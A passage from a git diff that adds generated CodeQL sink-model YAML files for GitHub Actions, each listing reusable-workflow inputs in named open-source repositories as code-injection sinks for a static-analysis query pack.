"code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] + - 
["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml new file mode 100644 index 000000000000..c07d2aba0b6c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml new file mode 100644 index 000000000000..77a7eaae309f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml new file mode 100644 index 000000000000..09299774b6a6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml 
@@ -0,0 +1,29 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", 
"generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml new file mode 100644 index 000000000000..028210d4eac9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml new file mode 100644 index 000000000000..2ea83d9d94b9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml new file mode 100644 index 000000000000..69f1b740c968 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..61af1d324413 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml new file mode 100644 index 000000000000..1532fc723aa9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml new file mode 100644 index 000000000000..f4a7cd26183d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml new file mode 100644 index 000000000000..119bfeaa7969 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml new file mode 100644 index 000000000000..10ea343b7aab --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml new file mode 100644 index 000000000000..6310b7155d32 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml new file mode 100644 index 000000000000..a1de7e9a8f93 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml new file mode 100644 index 000000000000..d6e334573e4b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml new file mode 100644 index 000000000000..eeff97a8aeac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml new file mode 100644 index 000000000000..34ffd6788b13 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml new file mode 100644 index 000000000000..8ee00d47f799 --- /dev/null 
+++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml new file mode 100644 index 000000000000..40b35b5c8732 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml new file mode 100644 index 000000000000..c02368b5d51f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..61b3e84b29e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml new file mode 100644 index 000000000000..72e4a3eec658 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..5e8754427718 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml 
@@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml new file mode 100644 index 000000000000..991743df7d23 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml new file mode 100644 index 000000000000..780d95fab47f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml new file mode 100644 index 000000000000..cf69379583d2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml 
@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-snowflake/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml new file mode 100644 index 000000000000..211fe546e28e --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/decidim_decidim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["decidim/decidim/.github/workflows/test_app.yml", "*", "inputs.test_command", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml new file mode 100644 index 000000000000..d59258ce992a --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/defectdojo_django-defectdojo.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["defectdojo/django-defectdojo/.github/workflows/release-x-manual-helm-chart.yml", "*", "inputs.release_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml new file mode 100644 index 000000000000..43f5349bf3c6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dependencytrack_dependency-track.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dependencytrack/dependency-track/.github/workflows/_meta-build.yaml", "*", "inputs.app-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml new file mode 100644 index 000000000000..d6ef60a96984 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/devexpress_testcafe.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["devexpress/testcafe/.github/workflows/test-server.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.test-script", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.display", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-functional.yml", "*", "inputs.matrix-jobs-count", "code-injection", "generated"] + - ["devexpress/testcafe/.github/workflows/test-client.yml", "*", "inputs.test-script", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml new file mode 100644 index 000000000000..1d41854bf71f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dfhack_dfhack.model.yml 
@@ -0,0 +1,18 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-windows.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.append-date-and-hash", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.common-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.xml-dump-type-sizes", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.tests", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.docs", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.extras", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.stonesense", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.platform-files", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.launchdf", "code-injection", "generated"] + - ["dfhack/dfhack/.github/workflows/build-linux.yml", "*", "inputs.gcc-ver", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml new file mode 100644 index 000000000000..9f64a59aead1 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/docker_build-push-action.model.yml 
